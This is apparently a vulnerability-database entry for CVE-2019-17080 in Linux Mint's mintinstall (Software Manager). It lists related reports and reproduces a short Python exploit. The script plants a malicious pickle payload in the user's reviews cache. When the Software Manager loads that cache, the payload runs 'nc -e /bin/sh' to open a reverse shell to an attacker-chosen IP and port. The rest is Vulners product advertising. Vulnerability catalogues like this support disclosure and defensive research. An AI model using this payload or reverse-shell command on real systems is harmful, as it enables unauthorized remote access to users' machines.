| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| mintinstall 7.9.9 - Code Execution Exploit | 4 Oct 201900:00 | – | zdt | |
| CVE-2019-17080 | 21 Sep 202104:41 | – | circl | |
| CVE-2019-17080 | 2 Oct 201912:17 | – | cve | |
| CVE-2019-17080 | 2 Oct 201912:17 | – | cvelist | |
| mintinstall 7.9.9 - Code Execution | 3 Oct 201900:00 | – | exploitpack | |
| CVE-2019-17080 | 2 Oct 201913:15 | – | nvd | |
| CVE-2019-17080 | 2 Oct 201913:15 | – | osv | |
| mintinstall 7.9.9 Code Execution | 2 Oct 201900:00 | – | packetstorm | |
| Code injection | 2 Oct 201913:15 | – | prion | |
| CVE-2019-17080 | 22 May 202508:18 | – | redhatcve |
# Exploit Title: mintinstall (aka Software Manager) object injection
# Date: 10/02/2019
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080
import os
import sys
def shellCode(payload):
with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
wb.write(payload)
print("[+] Start mintinstall")
if __name__=="__main__":
shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
else:
print("[!] exploit.py [IP] [PORT]")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation